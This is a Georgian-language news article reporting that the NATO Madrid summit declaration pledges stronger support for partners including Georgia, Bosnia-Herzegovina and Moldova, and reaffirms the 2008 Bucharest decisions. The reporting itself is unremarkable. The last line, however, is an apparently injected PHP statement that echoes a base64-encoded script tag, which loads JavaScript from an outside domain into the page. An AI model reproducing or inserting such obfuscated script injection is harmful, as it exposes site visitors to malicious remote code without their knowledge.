celsiusi
ავერსი საქკაბელი
ნატო-ს მადრიდის სამიტის ბოლოს მოკავშირე ქვეყნის ლიდერებმა მიიღეს დეკლარაცია, რომელშიც საქართველოც არის ნახსენები.
 
დეკლარაციის მიხედვით, ალიანსმა მიიღო გადაწყვეტილება პატნიორების, მათ შორის ბოსნია-ჰერცეგოვინის, საქართველოს და მოლდოვის სპეციალიზებული პოლიტიკური და პრაქტიკული მხარდაჭერის გასაძლიერებლად.
 
„ევროპაში შეცვლილი უსაფრთხოების გათვალისწინებით, ჩვენ მივიღეთ ახალი ზომების გადაწყვეტილება ჩვენი პატნიორების, მათ შორის ბოსნია-ჰერცეგოვინის, საქართველოს და მოლდოვის რესპუბლიკის სპეციალიზებული პოლიტიკური და პრაქტიკული მხარდაჭერის გასაძლიერებლად. ჩვენ ვმუშაობთ მათთან მათი ერთიანობისა და მდგრადობის გასაძლიერებლად, შესაძლებლობების განვითარებისთვის და მათი პოლიტიკური დამოუკიდებლობის დასაცავად. ჩვენ ასევე გავაძლიერებთ ჩვენი სამხრეთის პარტნიორების შესაძლებლობების განვითარების მხარდაჭერას“, – აღნიშნულია დეკლარაციაში.
 
ტექსტის თანახმად, სამიტის მონაწილეებს ჰქონდათ აზრთა ღირებული გაცვლა ავსტრალიის, ფინეთის, საქართველოს, იაპონიის, კორეის რესპუბლიკის, ახალი ზელანდიის, შვედეთის, უკრაინის სახელმწიფოს და მთავრობის მეთაურებთან, ასევე ევროპული საბჭოსა და ევროკომისიის პრეზიდენტებთან.
 
„ჩვენ შევიკრიბეთ მადრიდში ნატო-ს მრავალ პარტნიორთან ერთად. ჩვენ გვქონდა აზრთა ღირებული გაცვლა ავსტრალიის, ფინეთის, საქართველოს, იაპონიის, კორეის რესპუბლიკის, ახალი ზელანდიის, შვედეთის, უკრაინის სახელმწიფოს და მთავრობის მეთაურებთან, ასევე ევროპული საბჭოს პრეზიდენტთან და ევროკომისიის პრეზიდნეტთან. ჩვენ მივესალმებით იორდანიის და მავრიტანიის საგარეო საქმეთა მინისტრებთან, ასევე ბოსნია-ჰერცეგოვინის თავდაცვის მინისტრთან ჩართულობას“, – ნათქვამია დეკლარაციაში.
 
ამასთან, სამიტის მონაწილეებმა მიიღეს ნატო-ს 2022 წლის სტრატეგიული კონცეფცია, რომელშიც აღნიშნულია, რომ „ადასტურებენ 2008 წლის ბუქარესტის სამიტის და ყველა შემდგომ გადაწყვეტილებას საქართველოსა და უკრაინის მიმართ“.
666
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");